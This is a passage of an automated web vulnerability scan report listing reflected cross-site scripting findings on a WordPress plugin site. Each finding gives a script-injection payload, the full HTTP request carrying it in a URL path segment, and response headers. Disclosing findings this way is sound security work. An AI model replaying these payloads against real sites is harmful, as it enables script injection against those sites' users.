Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82727"><script>alert(1)</script>61afe33f333 was submitted in the REST URL parameter 1. This input was echoed as 82727\"><script>alert(1)</script>61afe33f333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site82727"><script>alert(1)</script>61afe33f333/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8345f"><script>alert(1)</script>a5d18f0e20a was submitted in the REST URL parameter 2. This input was echoed as 8345f\"><script>alert(1)</script>a5d18f0e20a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content8345f"><script>alert(1)</script>a5d18f0e20a/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b6e4"><script>alert(1)</script>1a8376b51b was submitted in the REST URL parameter 3. This input was echoed as 2b6e4\"><script>alert(1)</script>1a8376b51b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins2b6e4"><script>alert(1)</script>1a8376b51b/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dbd"><script>alert(1)</script>faa582e2f65 was submitted in the REST URL parameter 4. This input was echoed as c8dbd\"><script>alert(1)</script>faa582e2f65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerptc8dbd"><script>alert(1)</script>faa582e2f65/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367a3"><script>alert(1)</script>72b3425ad17 was submitted in the REST URL parameter 5. This input was echoed as 367a3\"><script>alert(1)</script>72b3425ad17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data367a3"><script>alert(1)</script>72b3425ad17/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa1"><script>alert(1)</script>6001cc5eecf was submitted in the REST URL parameter 6. This input was echoed as 51aa1\"><script>alert(1)</script>6001cc5eecf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider51aa1"><script>alert(1)</script>6001cc5eecf/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 116ab"><script>alert(1)</script>ee2c400a80f was submitted in the REST URL parameter 7. This input was echoed as 116ab\"><script>alert(1)</script>ee2c400a80f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt116ab"><script>alert(1)</script>ee2c400a80f/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5882b"><script>alert(1)</script>8f70873ebba was submitted in the REST URL parameter 8. This input was echoed as 5882b\"><script>alert(1)</script>8f70873ebba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default5882b"><script>alert(1)</script>8f70873ebba/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674554; expires=Thu, 02-Feb-2012 19:22:34 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44970"><script>alert(1)</script>402867fa415 was submitted in the REST URL parameter 9. This input was echoed as 44970\"><script>alert(1)</script>402867fa415 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css44970"><script>alert(1)</script>402867fa415 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bf0"><script>alert(1)</script>d53f8f09d5f was submitted in the REST URL parameter 1. This input was echoed as 75bf0\"><script>alert(1)</script>d53f8f09d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site75bf0"><script>alert(1)</script>d53f8f09d5f/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31761"><script>alert(1)</script>9a2ec4ef367 was submitted in the REST URL parameter 2. This input was echoed as 31761\"><script>alert(1)</script>9a2ec4ef367 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content31761"><script>alert(1)</script>9a2ec4ef367/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:23 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f6"><script>alert(1)</script>21d72fb4419 was submitted in the REST URL parameter 3. This input was echoed as 214f6\"><script>alert(1)</script>21d72fb4419 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins214f6"><script>alert(1)</script>21d72fb4419/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c380"><script>alert(1)</script>942fd5177a7 was submitted in the REST URL parameter 4. This input was echoed as 7c380\"><script>alert(1)</script>942fd5177a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login7c380"><script>alert(1)</script>942fd5177a7/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53af1"><script>alert(1)</script>8d9b584a4b9 was submitted in the REST URL parameter 5. This input was echoed as 53af1\"><script>alert(1)</script>8d9b584a4b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data53af1"><script>alert(1)</script>8d9b584a4b9/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
